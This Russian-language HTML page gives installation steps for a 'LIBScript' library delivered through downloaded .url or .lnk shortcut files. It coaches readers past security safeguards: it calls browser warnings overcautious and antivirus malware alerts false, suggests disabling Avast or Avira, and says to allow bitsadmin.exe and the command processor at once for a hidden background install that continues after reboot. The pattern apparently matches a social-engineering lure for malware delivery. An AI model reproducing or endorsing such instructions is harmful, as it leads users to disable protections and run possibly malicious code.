﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Установка библиотеки LIBScript</title>
<style type="text/css">
body {
	font-family: Calibri, "Trebuchet MS", sans-serif;
	max-width: 800px;
}
h1, h2, h3 {
	font-family: Arial, Helvetica, sans-serif;
}
.auto-style1 {
	text-align: center;
}
.auto-style2 {
	text-align: left;
}
</style>
</head>

<body>
	<h1>Установка библиотеки LIBScript</h1>
	<p>Библиотека LIBScript устанавливается и восстанавливается путём загузки и 
	запуска на исполнения скриптового файла (текстового файла с инструкциями). К 
	сожалению, поскольку эти файлы являются текстовыми, запуск их на компьютере 
	после загрузки вызывает проблемы у пользователей. Именно поэтому 
	разработчики предложили установку таких файлов с помощью дополнительных 
	файлов с расширением url и lnk.</p>
	<h3>Внимание!</h3>
	<p>Современные разработчики браузеров чрезмерно заботятся о безопасности 
	неопытных пользователей компьютеров. поэтому всячески усложняют им жизнь. 
	Так, браузеры на платформе webkit стали помечать файлы с расширением url и 
	lnk как небезопасные. Более того, при загрузке файлов с расширением lnk 
	происходит принудительная смена его расширения на download. Именно поэтому в 
	браузерах Google Chrome, Opera, Яндекс.Браузер, Microsoft Edge Chromium 
	необходимо при загрузке применять дополнительные действия, о которых будет 
	рассказано в конце данной инструкции. В браузерах Internet Explorer, Mozilla 
	Firefox ничего дополнительно к этой инструкции применять не надо. </p>
	<p>Это не говорит и большей опасности данных браузеров — просто разработчики 
	данных браузеров уважительно относятся к своим пользователям и доверяют их 
	выбору. </p>
	<h2>Инструкция по установке библиотеки</h2>
	<h3>Загрузка промежуточных файлов</h3>
	<ul>
		<li>Перейдите на страницу <a href="links.html">загрузки файлов</a> библиотеки LIBScript.</li>
		<li>Скачайте, на Ваш выбор, файл с расширением url или lnk</li>
		<li>Инструкция для <a href="../Download-Files/download.url.files.html" target="_blank">скачивания файлов в формате .url</a></li>
		<li>Инструкция для 
		<a href="../Download-Files/download.lnk.files.html" target="_blank">скачки файлов в формате .lnk</a></li>
		<li>После скачки файлов запустите их, дважды щёлкнув на них левой клавишей 
	мыши.</li>
	</ul>
	<h3>Загрузка и установка файлов библиотеки</h3>
	<ul>
		<li>Установка файлов библиотеки несколько отличается в различных браузерах. 
	Мы рассмотрим процесс установки библиотеки в программе Internet Explorer.</li>
		<li>После запуска файла с расширением URL или LNK в Internet Explorer 
	откроется следующее окно:</li>
	</ul>
	<p class="auto-style1"><a href="https://fastpic.ru/view/114/2021/0428/950254203dcd9ac8ca473951517b72b8.jpg.html" target="_blank"><img src="https://i114.fastpic.ru/thumb/2021/0428/b8/950254203dcd9ac8ca473951517b72b8.jpeg" border="0"></a></p>
	<p class="auto-style1"><em>Окно подтверждения загрузки программы</em></p>
	<ul>
		<li>
		<p class="auto-style2">Необходимо выбрать кнопку «Открыть»</p>
		</li>
		<li>
		<p class="auto-style2">Затем, поcле загрузки файла установщика, у Вас появится следующее окно:</p>
		</li>
	</ul>
	<p class="auto-style1"><a href="https://fastpic.ru/view/114/2021/0428/507c7d29acc14e3458ea4850c12d0de0.jpg.html" target="_blank"><img src="https://i114.fastpic.ru/thumb/2021/0428/e0/507c7d29acc14e3458ea4850c12d0de0.jpeg" border="0"></a></p>
	<p class="auto-style1"><em>Окно подтверждения запуска программы</em></p>
	<ul>
		<li>Необходимо также выбрать кнопку «Открыть»</li>
		<li>Примечание. На этом этапе может появится сообщение о запуске вредоносного 
	файла. Это сообщение ложное, возникает из-за того, что программа, с целью 
	обратной совместимости c предыдущими версиями Microsoft Windows, использует 
	устаревающие технологии. К тому же доступ к новейшим технологиям у компании 
	нет из-за антироссийских санкций США. При появлении этого сообщения ни в 
	коем случае не отключайте антивирус. Просто обновите антивирусные базы 
	Вашего Microsoft Windows Defender через центр обновления Windows. Отключать 
	антивирус имеет смысл только в случае, если у Вас стоит не рекомендованный 
	антивирус (Avast, Avira и т.п.).</li>
		<li>После этого возможно появление ещё нескольких окон, предупреждающих 
	пользователя о запуске некоторых прорграмм на компьютере (bitsadmin.exe, 
	обработчик команд Windows). Разрешите запуск этих программ немедленно.</li>
		<li>Затем начнётся установка программ в фоновом режиме. Установка продолжится 
	и после перезагрузки компьютера.</li>
	</ul>
	<p>&nbsp;</p>
</body>

</html>
